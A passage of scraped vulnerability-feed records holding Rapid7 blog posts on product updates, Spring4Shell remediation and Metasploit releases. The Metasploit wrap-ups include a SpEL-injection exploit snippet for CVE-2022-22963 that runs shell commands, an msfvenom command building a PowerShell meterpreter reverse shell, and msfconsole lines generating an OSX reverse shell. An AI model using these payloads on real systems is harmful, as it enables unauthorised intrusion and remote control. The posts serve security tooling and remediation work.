_\u201cOur app developers don't need to come to me, they don't need to come to our team, they don't need to send emails. They don't need to go through any formalities. When they commit code, the scan happens automatically. And, we created the metrics. So, if they see high-rated vulnerabilities they cannot push to production. The code will get blocked and they have to remediate it.\"_ \n \n_\\- Midhun Kumar, Head of Infrastructure and Cloud Operations, _[_Pearl Data Direct_](<https://www.rapid7.com/about/customers/pearl-data-direct/>)\n\nBuilding on the success of our [Jenkins Plugin](<https://extensions.rapid7.com/extension/insightappsec-jenkins-plugin>), [Atlassian Bamboo Plugin](<https://extensions.rapid7.com/extension/insightappsec-bamboo-plugin>), and [Azure DevOps](<https://extensions.rapid7.com/extension/insightappsec-azure-devops-extension>) CI/CD integrations, we recently added native [GitHub Actions](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>) and [GitLab CI/CD](<https://extensions.rapid7.com/extension/insightappsec-scan-gitlab>) integrations into InsightAppSec.\n\n### GitHub\n\n[GitHub Actions](<https://github.com/features/actions>) allows development teams to automate software workflows. With our new [InsightAppSec Scan Action for GitHub](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>), you can easily pull down the repo and add it to your DevOps pipelines. As part of your actions, you can trigger the InsightAppSec scan and have the results passed back into GitHub actions. If you want, you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThis is available for no additional cost in the [GitHub Marketplace](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>).\n\n### GitLab\n\n[GitLab CI/CD](<https://about.gitlab.com/stages-devops-lifecycle/continuous-integration/>) can automatically build, test, deploy, and monitor your applications. With our new InsightAppSec Scan Job, you can add a Docker command in your pipeline to trigger a scan. The results are sent back, and you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThe feature is available for no additional cost, and we have resources to help you learn [how to setup the GitLab integration](<https://docs.rapid7.com/insightappsec/gitlab-integration/>).\n\n## Spring4Shell testing and protection\n\n[CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), a zero-day vulnerability announced on April 1st, is no April Fools' Day joke. While it's not as dreadful as [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), it should still be patched, and there are reports of the Spring4Shell flaw being used to install the Mirai Botnet malware.\n\nTo help our customers secure their applications and understand their risk from Spring4Shell, Rapid7 released [new capabilities](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>), including:\n\n * New RCE Attack Module for Spring4Shell (InsightAppSec)\n * New Block Rule for Spring4Shell (tCell)\n * New Detection of CVE-2022-22965 in running applications (tCell)\n\n## Other enhancements\n\nInsightAppSec comes with the ability to create custom dashboards to quickly view and get insights on the risk and status of your program. Relying on feedback from customers, we recently added the ability to create dashboards based on certain apps or groups of apps. This allows you to quickly view risk in context of what matters.\n\nCustomers often like to manage their applications at scale, and one of the easiest ways to do that is via the tCell API. Significant feature enhancements include App Firewall event and block rules, OS commands, Local Files, suspicious actors, and more have all been added or updated. Check out our [API documentation](<https://docs.rapid7.com/tcell/api/>).\n\nRapid7's application security portfolio can help you shift left as well as shift right, depending on your needs and the status of your program. You can integrate InsightAppSec DAST into your CI/CD pipelines before deployment to production. And with tCell, you can add web application and API protection for your production environments.\n\nStay tuned for all we have in store in Q2!\n\n_**Additional reading**_\n\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n * _[InsightAppSec GitHub Integration Keeps Risky Code From Reaching Production](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>)_\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[A Dream Team-Up: Integrate InsightAppSec With ServiceNow ITSM](<https://www.rapid7.com/blog/post/2021/12/08/a-dream-team-up-integrate-insightappsec-with-servicenow-itsm/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T14:22:55", "type": "rapid7blog", "title": "Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-15T14:22:55", "id": "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "href": "https://blog.rapid7.com/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as "Spring4Shell." [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T17:56:13", "description": "\n\nThe Vulnerability Management team kicked off Q2 by [remediating](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) the instances of [Spring4Shell](<https://docs.rapid7.com/insightvm/spring4shell/>) (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that impacted cybersecurity teams worldwide. We also made several investments to both [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) throughout the second quarter that will help improve and better automate vulnerability management for your organization. Let\u2019s dive in!\n\n## [InsightVM] New dashboard cards based on CVSS v3 Severity \n\nCVSS (Common Vulnerability Scoring System) is an open standard for scoring the severity of vulnerabilities; it\u2019s a key metric that organizations use to prioritize risk in their environments. To empower organizations with tools to do this more effectively, we recently duplicated seven CVSS dashboard cards in InsightVM to include a version that sorts the vulnerabilities based on CVSS v3 scores.The v3 CVSS system made some changes to both quantitative and qualitative scores. For example, [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) had a score of 9.3 (high) in v2 and a 10 (critical) in v3. \n\n**Having both V2 and V3 version dashboards available allows you to prioritize and sort vulnerabilities according to your chosen methodology.** Security is not one-size-fits all, and the CVSS v2 scoring might provide more accurate vulnerability prioritization for some customers. InsightVM allows customers to choose whether v2 or v3 scoring is a better option for their organizations\u2019 unique needs. \n\nThe seven cards now available for CVSS v3 are:\n\n * Exploitable Vulnerabilities by CVSS Score\n * Exploitable Vulnerability Discovery Date by CVSS Score\n * Exploitable Vulnerability Publish Age by CVSS Score\n * Vulnerability Count By CVSS Score Over Time\n * Vulnerabilities by CVSS Score\n * Vulnerability Discovery Date by CVSS Score\n * Vulnerability Publish Age by CVSS Score\n\n\n## [InsightVM] Asset correlation for Citrix VDI instances\n\nYou asked, and we listened. By popular demand, InsightVM can now identify agent-based assets that are Citrix VDI instances and correlate them to the user, enabling more accurate asset/instance tagging.\n\nPreviously, when a user started a non-persistent VDI, it created a new AgentID, which then created a new asset in the console and consumed a user license. The InsightVM team is excited to bring this solution to our customers for this widely persistent problem. \n\nThrough the Improved Agent experience for Citrix VDI instances, when User X logs into their daily virtual desktop, it will automatically correlate to User\u2019s experience, maintain the asset history, and consume only one license. **The result is a smoother, more streamlined experience for organizations that deploy and scan Citrix VDI.**\n\n## [Nexpose and InsightVM] Scan Assistant made even easier to manage\n\nIn December 2021, we launched Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter. The Scan Assistant is also designed to drive improved vulnerability scanning performance in both InsightVM and Nexpose, with faster completion times for both vulnerability and policy scans. \n\nWe recently released Scan Assistant 1.1.0, which automates Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants. This new automation improves security \u2013 digital certificates are more difficult to compromise than credentials \u2013 and simplifies administration for organizations by enabling them to centrally manage features from the Security Console.\n\nCurrently, these enhancements are only available on Windows OS. To opt into automated Scan Assistant software updates and/or digital certificate rotation, please visit the Scan Assistant tab in the Scan Template.\n\n\n\n\n\n## [[Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>) and [InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>)] Recurring coverage \n\nRapid7 is committed to providing ongoing monitoring and coverage for a number of software products and services. The Vulnerability Management team continuously evaluates items to add to our recurring coverage list, basing selections on threat and security advisories, overall industry adoption, and customer requests. \n\nWe recently added several notable software products/services to our list of recurring coverage, including:\n\n * **AlmaLinux and Rocky Linux.** These free Linux operating systems have grown in popularity among Rapid7 Vulnerability Management customers seeking a replacement for CentOS. Adding recurring coverage for both AlmaLinux and Rocky Linux enables customers to more safely make the switch and maintain visibility into their vulnerability risk profile.\n * **Oracle E-Business Suite.** ERP systems contain organizations\u2019 \u201ccrown jewels\u201d \u2013 like customer data, financial information, strategic plans, and other proprietary data \u2013 so it\u2019s no surprise that attacks on these systems have [increased ](<https://www.mckinsey.com/business-functions/mckinsey-digital/our-insights/seven-steps-to-help-protect-your-erp-system-against-cyberattacks>)in recent years. Our new recurring coverage for the Oracle E-Business Suite is one of the most complex pieces of recurring coverage added to our list, providing coverage for several different components to ensure ongoing protection for Oracle E-Business Suite customers\u2019 most valuable information.\n * **VMware Horizon. **The VMware Horizon platform enables the delivery of virtual desktops and applications across a number of operating systems. VDI is a prime target for bad actors trying to access customer environments, due in part to its multiple entry points; once a hacker gains entry, it\u2019s fairly easy for them to jump into a company\u2019s servers and critical files. By providing recurring coverage for both the VMware server and client, Rapid7 gives customers broad coverage of this particular risk profile. \n\n## [InsightVM]\u200b\u200b Remediation Projects\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). We\u2019re excited to announce a few updates to this feature:\n\n### Better way to track progress for projects\n\nThe InsightVM team has updated the metric that calculates progress for Remediation Projects. The new metric will advance for each individual asset remediated within a \u201csolution\u201d group. Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress. Security teams can thus have meaningful discussions about progress with assigned remediators or upper management. [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Remediator Export\n\nWe added a new and much requested solution-based CSV export option to Remediation Projects. Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution. This update makes it easy and quick for the Security teams to share relevant data with the Remediation team. It also gives remediators all of the information they need. We call this a win-win for both teams! [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Project search bar for Projects\n\nOur team has added a search bar on the Remediation Projects page. This highly requested feature empowers customers to easily locate a project instead of having to scroll down the entire list.\n\n\n\n_**Additional reading:**_\n\n * _[InsightVM Release Update: Let\u2019s Focus on Remediation for Just a Minute](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>)_\n * _[How to Build and Enable a Cyber Target Operating Model](<https://www.rapid7.com/blog/post/2022/07/08/how-to-build-and-enable-a-cyber-target-operating-model/>)_\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-28T14:00:00", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": 